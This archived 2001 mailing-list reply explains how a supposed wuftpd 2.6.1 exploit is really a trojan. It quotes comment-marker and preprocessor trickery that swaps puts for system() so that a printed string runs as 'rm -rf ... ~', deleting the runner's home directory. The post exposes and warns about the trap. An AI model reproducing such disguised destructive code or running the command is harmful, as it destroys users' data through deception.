Re[2]: wuftpd 2.6.1 advisory/exploit

From: Alexander Ryumshin (miziat_private)
Date: Thu Sep 20 2001 - 05:55:14 PDT

    Hello,

    Yes, the trick is here:

    //#define POTS 12                       /* fill these in for your
    #define DEF_ALGN 1                       * target system
    //#define HEAP_ADDR 0x41414141           */
    #define target (unsigned long)
    unsigned long arg_addr = ADDR, align = DEF_ALGN,

    After preprocessing the code looks like

    unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system;

    Then puts' address is being replaced by system's or something like
    that and then puts("rm -rf is not elite ~"); does the main trick :)
    Hint: ~ means your home directory.

    --
    Best regards,
    Alexander